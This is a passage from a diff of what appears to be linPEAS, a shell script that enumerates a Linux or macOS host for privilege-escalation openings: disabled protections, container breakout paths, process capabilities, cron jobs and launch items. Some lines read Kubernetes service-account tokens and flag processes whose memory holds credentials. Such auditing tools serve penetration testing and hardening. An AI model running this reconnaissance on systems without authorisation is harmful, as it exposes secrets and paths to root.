4IEV4cGxvaXQgU3VnZ2VzdGVyIDIKCiBUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTsgeW91IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeQogaXQgdW5kZXIgdGhlIHRlcm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhcyBwdWJsaXNoZWQgYnkKIHRoZSBGcmVlIFNvZnR3YXJlIEZvdW5kYXRpb247IGVpdGhlciB2ZXJzaW9uIDIgb2YgdGhlIExpY2Vuc2UsIG9yCiAoYXQgeW91ciBvcHRpb24pIGFueSBsYXRlciB2ZXJzaW9uLgoKIFRoaXMgcHJvZ3JhbSBpcyBkaXN0cmlidXRlZCBpbiB0aGUgaG9wZSB0aGF0IGl0IHdpbGwgYmUgdXNlZnVsLAogYnV0IFdJVEhPVVQgQU5ZIFdBUlJBTlRZOyB3aXRob3V0IGV2ZW4gdGhlIGltcGxpZWQgd2FycmFudHkgb2YKIE1FUkNIQU5UQUJJTElUWSBvciBGSVRORVNTIEZPUiBBIFBBUlRJQ1VMQVIgUFVSUE9TRS4gIFNlZSB0aGUKIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlIGZvciBtb3JlIGRldGFpbHMuCiAgICAgICAgCiBZb3Ugc2hvdWxkIGhhdmUgcmVjZWl2ZWQgYSBjb3B5IG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhbG9uZwogd2l0aCB0aGlzIHByb2dyYW07IGlmIG5vdCwgd3JpdGUgdG8gdGhlIEZyZWUgU29mdHdhcmUgRm91bmRhdGlvbiwgSW5jLiwKIDUxIEZyYW5rbGluIFN0cmVldCwgRmlmdGggRmxvb3IsIEJvc3RvbiwgTUEgMDIxMTAtMTMwMSBVU0EuCgo9Y3V0Cg==" - echo $les2_b64 | base64 -d | perl - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Doctor Suggestions" - brew doctor - echo "" - fi - - - - #-- SY) AppArmor - print_2title "Protections" - print_list "AppArmor enabled? .............. "$NC - if [ "$(command -v aa-status 2>/dev/null)" ]; then - aa-status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then - apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then - ls -d /etc/apparmor* - else - echo_not_found "AppArmor" - fi - - #-- SY) grsecurity - print_list "grsecurity present? ............ "$NC - ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") - - #-- SY) PaX - print_list "PaX bins present? .............. "$NC - (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") - - #-- SY) Execshield - print_list "Execshield enabled? ............ "$NC - (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," - - #-- SY) SElinux - print_list "SELinux enabled? ............... "$NC - (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - - #-- SY) Gatekeeper - if [ "$MACPEAS" ]; then - print_list "Gatekeeper enabled? .......... "$NC - (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - - print_list "sleepimage encrypted? ........ "$NC - (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no - - print_list "XProtect? .................... "$NC - (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no - - print_list "SIP enabled? ................. "$NC - csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no - - print_list "Connected to JAMF? ........... "$NC - warn_exec jamf checkJSSConnection - - print_list "Connected to AD? ............. "$NC - dsconfigad -show && echo "" || echo_no - fi - - #-- SY) ASLR - print_list "Is ASLR enabled? ............... "$NC - ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) - if [ -z "$ASLR" ]; then - echo_not_found "/proc/sys/kernel/randomize_va_space"; - else - if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi - echo "" - fi - - #-- SY) Printer - print_list "Printer? ....................... "$NC - (lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null - - #-- SY) Running in a virtual environment - print_list "Is this a virtual machine? ..... "$NC - hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) - if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then - detectedvirt=$(systemd-detect-virt) - if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi - else - if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi - fi - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q Container; then - ############################################## - #---------------) Containers (---------------# - ############################################## - print_title "Containers" - containerCheck - - print_2title "Container related tools present" - command -v "$CONTAINER_CMDS" - - print_2title "Container details" - print_list "Is this a container? ...........$NC $containerType" - - print_list "Any running containers? ........ "$NC - # Get counts of running containers for each platform - dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) - podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) - lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) - rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) - if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then +print_list "Any running containers? ........ "$NC +# Get counts of running containers for each platform +dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) +podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) +lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) +rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) +if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then echo_no - else +else containerCounts="" if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," + # List any running containers if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi - fi +fi - #If docker - if echo "$containerType" | grep -qi "docker"; then +#If docker +if echo "$containerType" | grep -qi "docker"; then print_2title "Docker Container details" inDockerGroup print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," @@ -1473,26 +1531,26 @@ if echo $CHECKS | grep -q Container; then print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," if [ "$inContainer" ]; then - checkDockerRootless - print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," + checkDockerRootless + print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," fi if df -h | grep docker; then - print_2title "Docker Overlays" - df -h | grep docker + print_2title "Docker Overlays" + df -h | grep docker fi - fi +fi - if [ "$inContainer" ]; then +if [ "$inContainer" ]; then echo "" print_2title "Container & breakout enumeration" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC $(cat /etc/hostname)" + print_list "Container ID ...................$NC $(cat /etc/hostname && echo '')" if echo "$containerType" | grep -qi "docker"; then - print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" + print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" fi if echo "$containerType" | grep -qi "kubernetes"; then - print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" - print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" + print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" + print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" fi checkContainerExploits @@ -1505,13 +1563,13 @@ if echo $CHECKS | grep -q Container; then print_2title "Privilege Mode" if [ -x "$(command -v fdisk)" ]; then - if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then - echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," - else - echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," - fi + if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," + else + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," + fi else - echo_not_found + echo_not_found fi echo "" @@ -1522,444 +1580,358 @@ if echo $CHECKS | grep -q Container; then print_2title "Possible Entrypoints" ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq echo "" - fi +fi +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets; then +print_title "Processes, Crons, Timers, Services and Sockets" + +#################################################### +#-----) Processes & Cron & Services & Timers (-----# +#################################################### + +#-- PCS) Cleaned proccesses +print_2title "Cleaned processes" +if [ "$NOUSEPS" ]; then + printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC +fi +print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + +if [ "$NOUSEPS" ]; then + print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + pslist=$(print_ps) +else + (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + fi + fi + done + pslist=$(ps auxwww) + echo "" + + #-- PCS) Binary processes permissions + print_2title "Binary processes permissions (non 'root root' and not beloging to current user)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + binW="IniTialiZZinnggg" + ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + if [ -w "$bpath" ]; then + binW="$binW|$bpath" + fi + done + ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," +fi +echo "" + +#-- PCS) Files opened by processes belonging to other users +if ! [ "$IAMROOT" ]; then + print_2title "Files opened by processes belonging to other users" + print_info "This is usually empty because of the lack of privileges to read other user processes information" + lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +#-- PCS) Processes with credentials inside memory +print_2title "Processes with credentials in memory (root req)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" +if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi +if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi +if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi +if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi +if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi +if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi +echo "" - -if echo $CHECKS | grep -q Devs; then - ########################################### - #---------------) Devices (---------------# - ########################################### - print_title "Devices" - - #-- 1D) sd in /dev - print_2title "Any sd*/disk* disk in /dev? (limit 20)" - ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 +#-- PCS) Different processes 1 min +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then + print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" + temp_file=$(mktemp) + if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi echo "" - - #-- 2D) Unmounted - print_2title "Unmounted file-system?" - print_info "Check if you can mount umounted devices" - if [ -f "/etc/fstab" ]; then - grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" - else - echo_not_found "/etc/fstab" - fi - echo "" - - print_2title "Mounted disks information" - warn_exec diskutil list - echo "" - - print_2title "Mounted SMB Shares" - warn_exec smbutil statshares -a - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +#-- PCS) Cron +print_2title "Cron jobs" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" +command -v crontab 2>/dev/null || echo_not_found "crontab" +crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +command -v incrontab 2>/dev/null || echo_not_found "incrontab" +incrontab -l 2>/dev/null +ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" +cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +crontab -l -u "$USER" 2>/dev/null | tr -d "\r" +ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths +atq 2>/dev/null +echo "" -if echo $CHECKS | grep -q AvaSof; then - ########################################### - #---------) Available Software (----------# - ########################################### - print_title "Available Software" - - #-- 1AS) Useful software - print_2title "Useful software" - command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null +if [ "$MACPEAS" ]; then + print_2title "Third party LaunchAgents & LaunchDemons" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" + ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null echo "" - #-- 2AS) Search for compilers - print_2title "Installed Compiler" - (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); + print_2title "Writable System LaunchAgents & LaunchDemons" + find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + program="" + program=$(defaults read "$f" Program 2>/dev/null) + if ! [ "$program" ]; then + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + fi + if [ -w "$program" ]; then + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + done echo "" - if [ "$(command -v pkg 2>/dev/null)" ]; then - print_2title "Vulnerable Packages" - pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Installed Packages" - brew list - echo "" - fi - - if [ "$MACPEAS" ]; then - print_2title "Writable Installed Applications" - system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - - system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - echo "" - - #Useless info - #print_2title "Developer Tools" - #system_profiler SPDeveloperToolsDataType - #echo "" - fi - + print_2title "StartupItems" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" + ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null + echo "" + + print_2title "Login Items" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" + osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null + echo "" + + print_2title "SPStartupItemDataType" + system_profiler SPStartupItemDataType + echo "" + + print_2title "Emond scripts" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" + ls -l /private/var/db/emondClients echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi - -if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks; then - #################################################### - #-----) Processes & Cron & Services & Timers (-----# - #################################################### - print_title "Processes, Cron, Services, Timers & Sockets" - - #-- PCS) Cleaned proccesses - print_2title "Cleaned processes" - if [ "$NOUSEPS" ]; then - printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC - fi - print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - - if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - pslist=$(print_ps) - else - (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then - cpid=$(echo "$psline" | awk '{print $2}') - caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" - fi - fi - done - pslist=$(ps auxwww) - echo "" - - #-- PCS) Binary processes permissions - print_2title "Binary processes permissions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - binW="IniTialiZZinnggg" - ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do - if [ -w "$bpath" ]; then - binW="$binW|$bpath" - fi - done - ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," - fi - echo "" - - #-- PCS) Files opened by processes belonging to other users - if ! [ "$IAMROOT" ]; then - print_2title "Files opened by processes belonging to other users" - print_info "This is usually empty because of the lack of privileges to read other user processes information" - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - echo "" - fi - - #-- PCS) Processes with credentials inside memory - print_2title "Processes with credentials in memory (root req)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" - if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi - if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi - if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi - if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi - if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi - if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi - echo "" - - #-- PCS) Different processes 1 min - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then - print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" - temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi - echo "" - fi - - #-- PCS) Cron - print_2title "Cron jobs" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" - command -v crontab 2>/dev/null || echo_not_found "crontab" - crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - command -v incrontab 2>/dev/null || echo_not_found "incrontab" - incrontab -l 2>/dev/null - ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - crontab -l -u "$USER" 2>/dev/null | tr -d "\r" - ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths - atq 2>/dev/null - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Third party LaunchAgents & LaunchDemons" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" - ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null - echo "" - - print_2title "Writable System LaunchAgents & LaunchDemons" - find 